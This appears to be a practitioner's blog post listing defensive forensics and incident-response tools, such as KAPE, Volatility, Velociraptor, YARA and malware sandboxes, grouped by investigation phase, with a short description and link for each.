In the field of cybersecurity and digital forensics, having the right set of tools is essential to effectively analyze, detect, and respond to threats. Throughout my career, I relied on a variety of powerful tools to perform various analyses.
Below, I’ve compiled a list of tools, organized by DFIR phase. This list is not intended to present the best or most powerful tools, nor all the tools available on the Internet, but rather tools that have sparked my interest as part of my blue team activities. Everyone is free to use the tools they prefer; the important thing is to be familiar with them.
Acquisition#
KAPE (Kroll Artifact Parser and Extractor)
KAPE is a triage collection and parsing tool widely used for first-response data acquisition on Windows systems. It collects key forensic artifacts such as registry hives, event logs, MFT, Prefetch, and browser data in minutes, and can chain modules to parse them automatically using Eric Zimmerman’s tools. It is particularly useful when you need fast situational awareness without imaging the full disk.
https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kapeUAC (Unix-like Artifacts Collector)
UAC is a live response collection script for Unix-like systems, including Linux, macOS, BSD, ESXi, AIX, and Solaris. It automates the collection of forensic artifacts and system information based on configurable profiles, producing a structured archive ready for analysis. It is particularly useful when KAPE is not applicable, such as on non-Windows hosts.
https://github.com/tclahr/uacFTK Imager
FTK Imager is a free disk imaging and inspection tool from Exterro (formerly AccessData). It can create forensic images in multiple formats, mount images read-only for analysis, recover files via metadata, and capture live memory. It serves as a reliable alternative alongside KAPE and DFIR-ORC.
https://www.exterro.com/digital-forensics-software/ftk-imagerAVML (Acquire Volatile Memory for Linux)
AVML is a Microsoft tool for acquiring physical memory from Linux systems. It is distributed as a static binary with no kernel-mode dependencies, which makes it usable across a wide range of Linux distributions and kernel versions without prior preparation. It is particularly useful when memory acquisition needs to happen quickly on systems where compiling a kernel module is not an option.
https://github.com/microsoft/avmlDFIR-ORC
DFIR ORC is for those who want to acquire the data they need to respond to security incidents reliably.
https://github.com/DFIR-ORC/dfir-orcDFIR-OGRE
DFIR-OGRE is a command-line utility from ANSSI that extracts Windows forensic artifacts from DFIR-ORC archives. It uses a plug-in architecture to parse a wide range of artifacts such as LNK files, browser history, NTFS metadata, USN journal entries, AmCache, Prefetch, scheduled tasks, and EVTX logs. It outputs structured data that can be ingested into Splunk, Elastic, or other analysis platforms, and serves as a direct companion to DFIR-ORC.
https://github.com/ANSSI-FR/dfir-ogre
Disk & File System Analysis#
Eric Zimmerman’s Tools
Eric Zimmerman’s tools are a collection of free command-line utilities for parsing core Windows forensic artifacts. They include MFTECmd (MFT and USN journal), EvtxECmd (event logs to CSV), AppCompatCacheParser and AmcacheParser (execution evidence), Registry Explorer (registry hives), and PECmd (Prefetch). Their output integrates well with Timeline Explorer, making this toolkit a reference for Windows DFIR.
https://ericzimmerman.github.io/The Sleuth Kit (TSK)
The Sleuth Kit is the command-line foundation that Autopsy builds on. It provides tools such asfls,icat,mactime, andistatfor scriptable, low-level access to a file system. It is particularly useful when you need to recover deleted entries from metadata or build a body file for timelining.
https://www.sleuthkit.org/sleuthkit/Autopsy
Autopsy is a graphical interface for the Sleuth Kit forensic toolset. It facilitates detailed analysis of disks and partitions by allowing examination of file systems and recovery of deleted data.
https://www.autopsy.com/
Memory Analysis#
Volatility
Volatility is a RAM analysis tool used to extract and examine artifacts present in the memory of a compromised system. The Python 2 version of Volatility remains more feature-complete than the Python 3 version, but the community is actively working to enhance the newer version. While it may initially be complex to use, it becomes an invaluable tool with experience.
https://volatilityfoundation.org/MemProcFS
MemProcFS is a memory analysis tool that mounts a memory image (or live system memory) as a virtual file system. It exposes processes, handles, registry, network artifacts, and YARA scan results as browsable files and folders. It is easier to approach than Volatility’s plugin-based workflow and serves as a useful companion for fast memory triage.
https://github.com/ufrisk/MemProcFSPyDFIR
PyDFIR is a framework primarily based on Volatility. It is expected to expand with additional network functionalities in the near future.
https://github.com/PyDFIR
Timeline & Event Log Analysis#
Timeline Explorer
Timeline Explorer is a data visualization tool useful for analyzing and interpreting events that have occurred within an operating system over time. It is particularly effective for analyzing MFT (Master File Table) and EVTX (Windows Event Log) files. Eric Zimmerman’s tools, including Timeline Explorer, are highly regarded in the forensic community.
https://ericzimmerman.github.io/#!index.mdPlaso / log2timeline
Plaso is a Python-based super-timeline engine, withlog2timeline.pyas its primary frontend used to build a unified chronological view across hundreds of artifact types. It also providespinfoandpsortto inspect, filter, and export the resulting timeline. It is useful when you need broad temporal context across an investigation rather than a focused triage timeline.
https://plaso.readthedocs.io/APT-Hunter
APT-Hunter is an EVTX log analysis tool that, when used in conjunction with Timeline Explorer, can yield excellent results for detecting advanced persistent threats.
https://github.com/ahmedkhlief/APT-HunterHayabusa
Hayabusa is similar to APT-Hunter, focusing on EVTX log analysis and can be used alongside Timeline Explorer. It offers additional detection capabilities based on Sigma rule sets. Note: Chainsaw is a popular alternative in the same space, also Sigma-driven.
https://github.com/Yamato-Security/hayabusa
Threat Hunting & IR at Scale#
Velociraptor
Velociraptor is an open-source incident response and analysis tool that allows for large-scale querying and artifact collection from compromised systems.
https://docs.velociraptor.app/Kansa
Kansa is a PowerShell-based incident response framework for distributed collection of artifacts across an enterprise. It is lightweight and scriptable, and complements Velociraptor when you need rapid, ad-hoc collection. It is particularly relevant in Windows-only environments.
https://github.com/davehull/KansaWireshark
Wireshark is a network protocol analyzer used to capture and examine data passing through a network in real-time. It is essential for detailed analysis of network communications and diagnosing performance and security issues.
https://www.wireshark.org/Elastic/OpenSearch
Elastic and OpenSearch are open-source SIEMs (Security Information and Event Management) that are particularly useful for incident detection rather than forensic analysis. They are highly effective in environments with large volumes of logs, allowing for efficient querying and analysis using KQL (Kibana Query Language). OpenSearch, maintained by Amazon, is a recommended option for those looking to deploy one of these solutions.
https://www.elastic.co/
https://opensearch.org/
Rules & Detection Languages#
Sigma
Sigma is a generic, open signature format for SIEM rules. A Sigma rule can be converted into backend-specific queries for platforms such as Splunk, Elastic, or Sentinel, allowing detection content to be shared and ported across detection stacks. The community rule repository provides a useful baseline for blue teams.
https://github.com/SigmaHQ/sigmaYARA
YARA is a pattern-matching tool and rule language designed to identify and classify malware based on textual or binary patterns. Rules can be applied to files, memory images, or processes. YARA is embedded in many other tools such as MemProcFS, Velociraptor, Capa, and various sandboxes, making it a standard reference for malware signaturing.
https://virustotal.github.io/yara/
Malware Analysis#
Exalyze
Exalyze is a cloud-based malware analysis platform designed to accelerate static analysis of suspicious files. It can disassemble and inspect binaries within seconds, automating tedious tasks (like extracting interesting API-call sequences) to give analysts a quick overview of capabilities. Exalyze also offers one-click YARA rule generation and a similarity search engine to find related malware samples from a large database, greatly streamlining threat research and hunting.
https://exalyze.io/Dogbolt
Dogbolt is an interactive online decompiler service that produces decompiled C-like output from binaries using many popular decompilers in parallel. Essentially the reverse of the Compiler Explorer, it lets you upload a program and compare how tools like Ghidra, IDA Pro’s Hex-Rays, Binary Ninja, and others reconstruct the code. This helps reverse engineers and malware analysts quickly see different decompiler interpretations side-by-side for deeper static analysis.
https://dogbolt.org/Capa
Capa is a static analysis tool from Mandiant’s FLARE team that automatically identifies the capabilities of an executable, such as network communication, persistence, code injection, or anti-analysis techniques. It uses a community-maintained rule set and produces a readable summary of what a sample is likely to do, helping to accelerate triage before deeper reverse engineering.
https://github.com/mandiant/capaCyberChef
CyberChef is a web-based tool for data manipulation that supports encoding/decoding, encryption, compression, hashing, parsing, and many more operations chained as “recipes”. It is particularly useful when dealing with obfuscated PowerShell, encoded payloads, or any artifact requiring quick decoding during analysis.
https://gchq.github.io/CyberChef/Joe Sandbox
Joe Sandbox is a malware analysis platform that executes suspicious files in an isolated environment to observe their behavior. It generates detailed reports on the activities of the malware, aiding in threat detection and analysis.
https://www.joesandbox.com/Cuckoo Sandbox
Cuckoo3 is a modern, Python 3–based rewrite of Cuckoo Sandbox that provides a self-hosted alternative to commercial solutions like Joe Sandbox. Actively developed and open source, it focuses on automated dynamic malware analysis in isolated Windows environments.
https://github.com/cert-ee/cuckoo3Drakvuf Sandbox
DRAKVUF Sandbox is an open-source, self-hosted, hypervisor-level malware sandbox built on the DRAKVUF introspection engine. It provides automated, agentless dynamic malware analysis via a web interface for submitting suspicious files and exploring detailed behavioral reports.
https://github.com/CERT-Polska/drakvuf-sandbox
Threat Intelligence (Online Lookups)#
FARELO (Fast Reputation Lookup)
FARELO is an online threat intelligence aggregator for quick reputation checks. It allows analysts to query an IP address, domain, CVE, or file hash and retrieves real-time threat data from multiple sources in one place. By combining results from various threat intel databases, FARELO provides a convenient snapshot of malicious indicators associated with the queried entity, saving time in investigations.
https://farelo.nawhack.fr/VirusTotal
VirusTotal is a well-known service for scanning files and URLs for viruses and other malicious content.
https://www.virustotal.com/gui/home/uploadURLScan
URLScan is an online service that analyzes URLs to detect malicious behavior. It provides detailed information about the content and connections of submitted URLs, helping to identify potential threats.
https://urlscan.io/OpenCTI
OpenCTI (Open Cyber Threat Intelligence) is an open-source platform that facilitates the management and sharing of cyber threat intelligence. It helps to centralize, structure, and analyze threat information to improve organizational cybersecurity.
https://github.com/OpenCTI-Platform/opencti
Virtual Machines / Bundles of Tools#
SIFT Workstation
SIFT Workstation is an open-source Linux distribution pre-configured with forensic and incident response tools, such as Volatility and Sleuth Kit. It is designed to be a comprehensive digital forensic environment.
https://www.sans.org/tools/sift-workstation/REMnux
REMnux is a Linux distribution specialized in reverse engineering. It includes a collection of tools for malware analysis, network traffic analysis, and digital forensic investigations.
https://remnux.org/Flare VM
Flare VM is a collection of tools to prepare a Windows VM for reverse engineering and forensic analysis. It serves as a Windows alternative to SIFT Workstation and REMnux.
https://github.com/mandiant/flare-vm
This list will evolve over time. I hope it will help you as much as it has helped me in the past.
